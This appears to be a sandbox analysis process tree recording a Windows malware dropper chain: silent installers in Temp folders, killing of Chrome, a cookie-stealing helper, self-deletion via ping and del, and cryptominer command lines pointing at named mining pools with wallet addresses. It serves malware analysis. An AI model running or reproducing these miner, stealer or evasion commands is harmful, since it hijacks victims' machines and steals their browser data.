-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\y2ug4en3.njp\GcleanerWW.exe /mixone & exit15⤵
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\luvqexul.sn1\app.exe /8-2222 & exit15⤵
-
C:\Users\Admin\AppData\Local\Temp\luvqexul.sn1\app.exeC:\Users\Admin\AppData\Local\Temp\luvqexul.sn1\app.exe /8-222216⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qp1a4ccs.zbc\file.exe & exit15⤵
-
C:\Users\Admin\AppData\Local\Temp\qp1a4ccs.zbc\file.exeC:\Users\Admin\AppData\Local\Temp\qp1a4ccs.zbc\file.exe16⤵
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"17⤵
-
C:\Users\Admin\AppData\Local\Temp\CYS5DZ8SLI\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\CYS5DZ8SLI\multitimer.exe" 0 3060197d33d91c80.94013368 0 10118⤵
-
C:\Users\Admin\AppData\Local\Temp\CYS5DZ8SLI\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\CYS5DZ8SLI\multitimer.exe" 1 3.1617397261.6067860d0d971 10119⤵
-
C:\Users\Admin\AppData\Local\Temp\CYS5DZ8SLI\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\CYS5DZ8SLI\multitimer.exe" 2 3.1617397261.6067860d0d97120⤵
-
C:\Users\Admin\AppData\Local\Temp\ldrhzv2ipao\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\ldrhzv2ipao\Setup3310.exe" /Verysilent /subid=57721⤵
-
C:\Users\Admin\AppData\Local\Temp\is-I2GA6.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-I2GA6.tmp\Setup3310.tmp" /SL5="$203C8,138429,56832,C:\Users\Admin\AppData\Local\Temp\ldrhzv2ipao\Setup3310.exe" /Verysilent /subid=57722⤵
-
C:\Users\Admin\AppData\Local\Temp\is-FPHB1.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-FPHB1.tmp\Setup.exe" /Verysilent23⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\4py2sfapeow\app.exe"C:\Users\Admin\AppData\Local\Temp\4py2sfapeow\app.exe" /8-2321⤵
-
-
C:\Users\Admin\AppData\Local\Temp\klphhvxqiai\cpyrix.exe"C:\Users\Admin\AppData\Local\Temp\klphhvxqiai\cpyrix.exe" /VERYSILENT21⤵
-
C:\Users\Admin\AppData\Roaming\1.exeC:\Users\Admin\AppData\Roaming\1.exe22⤵
-
C:\Users\Admin\AppData\Roaming\1.exe"{path}"23⤵
-
-
-
C:\Users\Admin\AppData\Roaming\2.exeC:\Users\Admin\AppData\Roaming\2.exe22⤵
-
C:\Windows\SysWOW64\at.exe"C:\Windows\System32\at.exe"23⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\cmd.exe < Tre.pub23⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\System32\cmd.exe24⤵
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\14j1s4pd1a0\vict.exe"C:\Users\Admin\AppData\Local\Temp\14j1s4pd1a0\vict.exe" /VERYSILENT /id=53521⤵
-
C:\Users\Admin\AppData\Local\Temp\is-22M9Q.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-22M9Q.tmp\vict.tmp" /SL5="$10578,870426,780800,C:\Users\Admin\AppData\Local\Temp\14j1s4pd1a0\vict.exe" /VERYSILENT /id=53522⤵
-
C:\Users\Admin\AppData\Local\Temp\is-0MJ6O.tmp\win1host.exe"C:\Users\Admin\AppData\Local\Temp\is-0MJ6O.tmp\win1host.exe" 53523⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\ep0i2boyqsb\wsvcrm022ek.exe"C:\Users\Admin\AppData\Local\Temp\ep0i2boyqsb\wsvcrm022ek.exe" /ustwo INSTALL21⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7440 -s 65622⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7440 -s 70422⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7440 -s 68422⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7440 -s 64022⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7440 -s 89222⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7440 -s 85622⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7440 -s 96822⤵
- Program crash
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\3JV5VKQYW0\setups.exe"C:\Users\Admin\AppData\Local\Temp\3JV5VKQYW0\setups.exe" ll18⤵
-
C:\Users\Admin\AppData\Local\Temp\is-G4B9D.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-G4B9D.tmp\setups.tmp" /SL5="$501A2,635399,250368,C:\Users\Admin\AppData\Local\Temp\3JV5VKQYW0\setups.exe" ll19⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe"17⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe18⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe19⤵
- Kills process with taskkill
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"17⤵
-
C:\Users\Admin\AppData\Roaming\753D.tmp.exe"C:\Users\Admin\AppData\Roaming\753D.tmp.exe"18⤵
-
C:\Users\Admin\AppData\Roaming\753D.tmp.exe"C:\Users\Admin\AppData\Roaming\753D.tmp.exe"19⤵
-
-
-
C:\Users\Admin\AppData\Roaming\822E.tmp.exe"C:\Users\Admin\AppData\Roaming\822E.tmp.exe"18⤵
-
C:\Windows\system32\msiexec.exe-P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.work@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 9999919⤵
-
-
C:\Windows\system32\msiexec.exe-o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8 --cpu-max-threads-hint 50 -r 999919⤵
-
-
-
C:\Users\Admin\AppData\Roaming\87DD.tmp.exe"C:\Users\Admin\AppData\Roaming\87DD.tmp.exe"18⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"18⤵
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.119⤵
- Runs ping.exe
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe"17⤵
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\d3iawjyi.nfo\Four.exe & exit15⤵
-
C:\Users\Admin\AppData\Local\Temp\d3iawjyi.nfo\Four.exeC:\Users\Admin\AppData\Local\Temp\d3iawjyi.nfo\Four.exe16⤵
-
C:\Users\Admin\AppData\Local\Temp\MBPTAPMBDG\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\MBPTAPMBDG\multitimer.exe" 0 306033e7ac94ccd3.87625057 0 10417⤵
-
C:\Users\Admin\AppData\Local\Temp\MBPTAPMBDG\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\MBPTAPMBDG\multitimer.exe" 1 3.1617397295.6067862fbb95a 10418⤵
-
C:\Users\Admin\AppData\Local\Temp\MBPTAPMBDG\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\MBPTAPMBDG\multitimer.exe" 2 3.1617397295.6067862fbb95a19⤵
-
C:\Users\Admin\AppData\Local\Temp\mmrhaz3uuyr\app.exe"C:\Users\Admin\AppData\Local\Temp\mmrhaz3uuyr\app.exe" /8-2320⤵
-
-
C:\Users\Admin\AppData\Local\Temp\ioicd4zmfif\cpyrix.exe"C:\Users\Admin\AppData\Local\Temp\ioicd4zmfif\cpyrix.exe" /VERYSILENT20⤵
-
-
C:\Users\Admin\AppData\Local\Temp\1wf0ktbcmrh\3nap5ecsh4s.exe"C:\Users\Admin\AppData\Local\Temp\1wf0ktbcmrh\3nap5ecsh4s.exe" /ustwo INSTALL20⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8368 -s 89621⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8368 -s 96021⤵
- Program crash
-
-
-
C:\Users\Admin\AppData\Local\Temp\pjqsctbl4cc\vict.exe"C:\Users\Admin\AppData\Local\Temp\pjqsctbl4cc\vict.exe" /VERYSILENT /id=53520⤵
-
C:\Users\Admin\AppData\Local\Temp\is-CPAQS.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-CPAQS.tmp\vict.tmp" /SL5="$1077A,870426,780800,C:\Users\Admin\AppData\Local\Temp\pjqsctbl4cc\vict.exe" /VERYSILENT /id=53521⤵
-
C:\Users\Admin\AppData\Local\Temp\is-CKBIO.tmp\win1host.exe"C:\Users\Admin\AppData\Local\Temp\is-CKBIO.tmp\win1host.exe" 53522⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\5s5notpnzpv\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\5s5notpnzpv\Setup3310.exe" /Verysilent /subid=57720⤵
-
C:\Users\Admin\AppData\Local\Temp\is-E5SBR.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-E5SBR.tmp\Setup3310.tmp" /SL5="$10834,138429,56832,C:\Users\Admin\AppData\Local\Temp\5s5notpnzpv\Setup3310.exe" /Verysilent /subid=57721⤵
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\5UDDM6PTBG\setups.exe"C:\Users\Admin\AppData\Local\Temp\5UDDM6PTBG\setups.exe" ll17⤵
-
C:\Users\Admin\AppData\Local\Temp\is-25IQT.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-25IQT.tmp\setups.tmp" /SL5="$5027E,635399,250368,C:\Users\Admin\AppData\Local\Temp\5UDDM6PTBG\setups.exe" ll18⤵
-
-
-
-
-
-
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\22.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\22.exe"11⤵
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files\javcse\install.vbs"12⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\javcse\install.dll",install13⤵
-
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\HookSetp.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\HookSetp.exe"11⤵
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\Three.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\Three.exe"11⤵
-
C:\Users\Admin\AppData\Local\Temp\KSUI6UO1XR\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\KSUI6UO1XR\multitimer.exe" 0 306065bb10421b26.04333812 0 10312⤵
-
C:\Users\Admin\AppData\Local\Temp\KSUI6UO1XR\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\KSUI6UO1XR\multitimer.exe" 1 3.1617397091.60678563c4285 10313⤵
-
C:\Users\Admin\AppData\Local\Temp\KSUI6UO1XR\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\KSUI6UO1XR\multitimer.exe" 2 3.1617397091.60678563c428514⤵
-
C:\Users\Admin\AppData\Local\Temp\vix5mkwk1ny\vict.exe"C:\Users\Admin\AppData\Local\Temp\vix5mkwk1ny\vict.exe" /VERYSILENT /id=53515⤵
-
C:\Users\Admin\AppData\Local\Temp\is-8M9LT.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-8M9LT.tmp\vict.tmp" /SL5="$C02A4,870426,780800,C:\Users\Admin\AppData\Local\Temp\vix5mkwk1ny\vict.exe" /VERYSILENT /id=53516⤵
-
C:\Users\Admin\AppData\Local\Temp\is-89T0N.tmp\win1host.exe"C:\Users\Admin\AppData\Local\Temp\is-89T0N.tmp\win1host.exe" 53517⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\la0mbtzepmc\cpyrix.exe"C:\Users\Admin\AppData\Local\Temp\la0mbtzepmc\cpyrix.exe" /VERYSILENT15⤵
-
C:\Users\Admin\AppData\Roaming\1.exeC:\Users\Admin\AppData\Roaming\1.exe16⤵
-
C:\Users\Admin\AppData\Roaming\1.exe"{path}"17⤵
-
-
-
C:\Users\Admin\AppData\Roaming\2.exeC:\Users\Admin\AppData\Roaming\2.exe16⤵
-
C:\Windows\SysWOW64\at.exe"C:\Windows\System32\at.exe"17⤵
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\cmd.exe < Tre.pub17⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\System32\cmd.exe18⤵
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\xkaawcga11i\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\xkaawcga11i\Setup3310.exe" /Verysilent /subid=57715⤵
-
C:\Users\Admin\AppData\Local\Temp\is-MQF0U.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-MQF0U.tmp\Setup3310.tmp" /SL5="$7050E,138429,56832,C:\Users\Admin\AppData\Local\Temp\xkaawcga11i\Setup3310.exe" /Verysilent /subid=57716⤵
-
C:\Users\Admin\AppData\Local\Temp\is-GI97J.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-GI97J.tmp\Setup.exe" /Verysilent17⤵
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\jg7_7wjg.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\jg7_7wjg.exe"18⤵
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe"18⤵
-
C:\Users\Admin\AppData\Local\Temp\is-O8T8B.tmp\LabPicV3.tmp"C:\Users\Admin\AppData\Local\Temp\is-O8T8B.tmp\LabPicV3.tmp" /SL5="$60278,239334,155648,C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\LabPicV3.exe"19⤵
-
C:\Users\Admin\AppData\Local\Temp\is-M4N87.tmp\ppppppfy.exe"C:\Users\Admin\AppData\Local\Temp\is-M4N87.tmp\ppppppfy.exe" /S /UID=lab21420⤵
-
C:\Users\Admin\AppData\Local\Temp\e7-0e4d8-475-25f8d-d7dd657bd9660\Lipucudefe.exe"C:\Users\Admin\AppData\Local\Temp\e7-0e4d8-475-25f8d-d7dd657bd9660\Lipucudefe.exe"21⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\chsocfxt.0tw\md6_6ydj.exe & exit22⤵
-
C:\Users\Admin\AppData\Local\Temp\chsocfxt.0tw\md6_6ydj.exeC:\Users\Admin\AppData\Local\Temp\chsocfxt.0tw\md6_6ydj.exe23⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\o2mxofth.0bg\askinstall31.exe & exit22⤵
-
C:\Users\Admin\AppData\Local\Temp\o2mxofth.0bg\askinstall31.exeC:\Users\Admin\AppData\Local\Temp\o2mxofth.0bg\askinstall31.exe23⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe24⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe25⤵
- Kills process with taskkill
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\lbrkry0b.eu4\toolspab1.exe & exit22⤵
-
C:\Users\Admin\AppData\Local\Temp\lbrkry0b.eu4\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\lbrkry0b.eu4\toolspab1.exe23⤵
-
C:\Users\Admin\AppData\Local\Temp\lbrkry0b.eu4\toolspab1.exeC:\Users\Admin\AppData\Local\Temp\lbrkry0b.eu4\toolspab1.exe24⤵
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\i0yj1lyj.dyl\setup_10.2_mix.exe & exit22⤵
-
C:\Users\Admin\AppData\Local\Temp\i0yj1lyj.dyl\setup_10.2_mix.exeC:\Users\Admin\AppData\Local\Temp\i0yj1lyj.dyl\setup_10.2_mix.exe23⤵
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\l0foeqj1.uir\GcleanerWW.exe /mixone & exit22⤵
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vhmg4ohl.uyx\app.exe /8-2222 & exit22⤵
-
-
-
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\22.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\22.exe"18⤵
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files\javcse\install.vbs"19⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\javcse\install.dll",install20⤵
-
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\Three.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\Three.exe"18⤵
-
C:\Users\Admin\AppData\Local\Temp\DJFDFHW0DV\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\DJFDFHW0DV\multitimer.exe" 0 306065bb10421b26.04333812 0 10319⤵
-
C:\Users\Admin\AppData\Local\Temp\DJFDFHW0DV\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\DJFDFHW0DV\multitimer.exe" 1 3.1617397295.6067862f9a6db 10320⤵
-
C:\Users\Admin\AppData\Local\Temp\DJFDFHW0DV\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\DJFDFHW0DV\multitimer.exe" 2 3.1617397295.6067862f9a6db21⤵
-
C:\Users\Admin\AppData\Local\Temp\w3ozqphhtty\cpyrix.exe"C:\Users\Admin\AppData\Local\Temp\w3ozqphhtty\cpyrix.exe" /VERYSILENT22⤵
-
C:\Users\Admin\AppData\Roaming\1.exeC:\Users\Admin\AppData\Roaming\1.exe23⤵
-
-
C:\Users\Admin\AppData\Roaming\2.exeC:\Users\Admin\AppData\Roaming\2.exe23⤵
-
C:\Windows\SysWOW64\at.exe"C:\Windows\System32\at.exe"24⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\o5dt3yarf5i\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\o5dt3yarf5i\Setup3310.exe" /Verysilent /subid=57722⤵
-
C:\Users\Admin\AppData\Local\Temp\is-QN2J4.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-QN2J4.tmp\Setup3310.tmp" /SL5="$106FE,138429,56832,C:\Users\Admin\AppData\Local\Temp\o5dt3yarf5i\Setup3310.exe" /Verysilent /subid=57723⤵
-
C:\Users\Admin\AppData\Local\Temp\is-EBTI3.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-EBTI3.tmp\Setup.exe" /Verysilent24⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\yvpvy15bc3u\vict.exe"C:\Users\Admin\AppData\Local\Temp\yvpvy15bc3u\vict.exe" /VERYSILENT /id=53522⤵
-
C:\Users\Admin\AppData\Local\Temp\is-IKDU5.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-IKDU5.tmp\vict.tmp" /SL5="$10760,870426,780800,C:\Users\Admin\AppData\Local\Temp\yvpvy15bc3u\vict.exe" /VERYSILENT /id=53523⤵
-
C:\Users\Admin\AppData\Local\Temp\is-1V4I2.tmp\win1host.exe"C:\Users\Admin\AppData\Local\Temp\is-1V4I2.tmp\win1host.exe" 53524⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\5jzvmnfao4j\bztdij3errn.exe"C:\Users\Admin\AppData\Local\Temp\5jzvmnfao4j\bztdij3errn.exe" /ustwo INSTALL22⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4848 -s 65223⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4848 -s 66823⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4848 -s 71623⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4848 -s 62423⤵
- Program crash
-
-
-
C:\Users\Admin\AppData\Local\Temp\pz0jngpnc2b\app.exe"C:\Users\Admin\AppData\Local\Temp\pz0jngpnc2b\app.exe" /8-2322⤵
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\B7EVAZ8N4Z\setups.exe"C:\Users\Admin\AppData\Local\Temp\B7EVAZ8N4Z\setups.exe" ll19⤵
-
C:\Users\Admin\AppData\Local\Temp\is-UVJ9C.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-UVJ9C.tmp\setups.tmp" /SL5="$3038E,635399,250368,C:\Users\Admin\AppData\Local\Temp\B7EVAZ8N4Z\setups.exe" ll20⤵
-
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\J1bOtx55AJEQ.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\J1bOtx55AJEQ.exe"18⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe19⤵
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lilalmix.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lilalmix.exe"18⤵
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lilalmix.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lilalmix.exe"19⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Remove.bat" 3288 C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lilalmix.exe"20⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /PID 328821⤵
- Kills process with taskkill
-
-
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\HookSetp.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\HookSetp.exe"18⤵
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\guihuali-game.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\guihuali-game.exe"18⤵
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"19⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install20⤵
-
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe"18⤵
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\RunWW.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\RunWW.exe"18⤵
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\hjjgaa.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\hjjgaa.exe"18⤵
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt19⤵
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt19⤵
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\0buqz545rsl\app.exe"C:\Users\Admin\AppData\Local\Temp\0buqz545rsl\app.exe" /8-2315⤵
-
C:\Users\Admin\AppData\Local\Temp\0buqz545rsl\app.exe"C:\Users\Admin\AppData\Local\Temp\0buqz545rsl\app.exe" /8-2316⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\14hucgurdvv\vpn.exe"C:\Users\Admin\AppData\Local\Temp\14hucgurdvv\vpn.exe" /silent /subid=48215⤵
-
C:\Users\Admin\AppData\Local\Temp\is-FLKNJ.tmp\vpn.tmp"C:\Users\Admin\AppData\Local\Temp\is-FLKNJ.tmp\vpn.tmp" /SL5="$40542,15170975,270336,C:\Users\Admin\AppData\Local\Temp\14hucgurdvv\vpn.exe" /silent /subid=48216⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\bvxetfrbs0q\z1l3ka4vt2p.exe"C:\Users\Admin\AppData\Local\Temp\bvxetfrbs0q\z1l3ka4vt2p.exe" /ustwo INSTALL15⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5792 -s 65616⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5792 -s 66816⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5792 -s 62416⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5792 -s 66816⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5792 -s 88416⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5792 -s 96016⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5792 -s 97216⤵
- Program crash
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\YLWBGNOKM4\setups.exe"C:\Users\Admin\AppData\Local\Temp\YLWBGNOKM4\setups.exe" ll12⤵
-
C:\Users\Admin\AppData\Local\Temp\is-MHEDP.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-MHEDP.tmp\setups.tmp" /SL5="$3050C,635399,250368,C:\Users\Admin\AppData\Local\Temp\YLWBGNOKM4\setups.exe" ll13⤵
-
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\guihuali-game.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\guihuali-game.exe"11⤵
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"12⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install13⤵
-
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lilalmix.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lilalmix.exe"11⤵
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lilalmix.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lilalmix.exe"12⤵
-
C:\Users\Admin\Videos\lilal.exe"C:\Users\Admin\Videos\lilal.exe"13⤵
-
